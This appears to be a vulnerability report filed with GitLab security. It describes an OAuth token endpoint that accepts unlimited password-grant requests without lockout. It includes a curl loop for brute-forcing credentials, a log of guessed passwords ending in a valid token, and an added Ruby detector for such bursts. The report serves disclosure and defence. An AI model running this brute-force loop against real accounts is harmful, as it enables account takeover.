
ESCALATED: OAuth Token Endpoint Susceptible to Brute-Force Attacks and Credential Spraying

Summary

The endpoint https://gitlab.com/oauth/token, used with the grant_type=password parameter, lets a potential attacker evade all safeguards against credential spraying and account brute-forcing that exist on gitlab.com/users/sign_in, among them:

  • An arbitrary number of requests can be sent at an arbitrary cadence, so credentials can be tested reliably.

  • Accounts being brute-forced are never blocked, even after 10 failed attempts at obtaining a valid OAuth token, whereas blocking normally happens for login attempts via /users/sign_in.

Steps to reproduce

The absence of rate limiting can be tested easily by repeatedly sending POST requests with grant_type=password to oauth/token, as shown on https://docs.gitlab.com/ce/api/oauth2.html#resource-owner-password-credentials:

while true; do echo -n "$(date +'%T') -) "; curl --data 'grant_type=password&username=mymail@domain.com&password=mypassword' --request POST https://gitlab.com/oauth/token; echo; done

Logs from a real test look as follows:

1561656152.6030874  e:  myemail@gitlab.com p:  abcde@  valid:  False 401
1561656153.3011422  e:  myemail@gitlab.com p:  abcdeA  valid:  False 401
1561656154.5376472  e:  myemail@gitlab.com p:  abcdeB  valid:  False 401
1561656155.155709   e:  myemail@gitlab.com p:  abcdeC  valid:  False 401
1561656155.7969038  e:  myemail@gitlab.com p:  abcdeD  valid:  False 401
1561656156.7311993  e:  myemail@gitlab.com p:  abcdeE  valid:  False 401
1561656157.3582034  e:  myemail@gitlab.com p:  abcdeF  valid:  False 401
1561656158.0892327  e:  myemail@gitlab.com p:  abcdeG  valid:  False 401
1561656158.9248016  e:  myemail@gitlab.com p:  abcdeH  valid:  False 401
1561656159.6772146  e:  myemail@gitlab.com p:  abcdeI  valid:  False 401
1561656160.5643692  e:  myemail@gitlab.com p:  abcdeJ  valid:  False 401
1561656161.3276572  e:  myemail@gitlab.com p:  abcdeK  valid:  False 401
1561656162.0689363  e:  myemail@gitlab.com p:  abcdeL  valid:  False 401
1561656162.8939586  e:  myemail@gitlab.com p:  abcdeM  valid:  True 200

{'access_token': '********************************************', 'token_type': 'bearer', 'refresh_token': '*******************************************************', 'scope': 'api', 'created_at': 1561473301}
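As an added example (not GitLab's code and not part of the original report), a small Ruby detector that applies the login-style failure threshold the report says is missing to token-endpoint logs in the format shown above. The log lines, the account names and the 10-failure threshold are constructed assumptions.

```ruby
# Parses lines of the form "<ts>  e:  <email> p:  <password>  valid:  <True|False> <status>"
LINE_RE = /\A(?<ts>\d+\.\d+)\s+e:\s+(?<email>\S+)\s+p:\s+\S+\s+valid:\s+(?<valid>True|False)\s+(?<status>\d{3})\z/

Attempt = Struct.new(:ts, :email, :valid, :status)

def parse_line(line)
  m = LINE_RE.match(line.strip) or return nil
  Attempt.new(m[:ts].to_f, m[:email], m[:valid] == "True", m[:status].to_i)
end

# Flags an account once more than `limit` failed token requests land within `window`
# seconds (the point at which /users/sign_in would have locked it), and separately flags
# a success that follows a run of failures, i.e. a likely guessed password.
def detect(lines, limit: 10, window: 60)
  alerts = []
  failures = Hash.new { |h, k| h[k] = [] }  # email -> timestamps of recent failures
  lines.each do |line|
    a = parse_line(line) or next
    recent = failures[a.email]
    if a.valid
      alerts << [:success_after_failures, a.email, recent.size] if recent.size >= 3
      recent.clear
      next
    end
    recent << a.ts
    recent.shift while recent.first < a.ts - window   # drop failures outside the window
    alerts << [:burst, a.email, recent.size] if recent.size == limit + 1  # fire once on crossing
  end
  alerts
end

# Constructed sample log: 13 failures for one account in 13 s, then a success;
# one unrelated single failure that must stay below the threshold.
SAMPLE_LOG = [
  *(0..12).map { |i| "#{1561656152 + i}.5  e:  victim@example.com p:  guess#{i}  valid:  False 401" },
  "1561656160.0  e:  other@example.com p:  typo  valid:  False 401",
  "1561656165.1  e:  victim@example.com p:  guess13  valid:  True 200"
]

detect(SAMPLE_LOG).each { |kind, email, n| puts "#{kind}: #{email} (#{n} failures)" }
```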

cc @gitlab-com/gl-security/secops @gitlab-com/gl-security/appsec @asaba

Edited by GitLab SecurityBot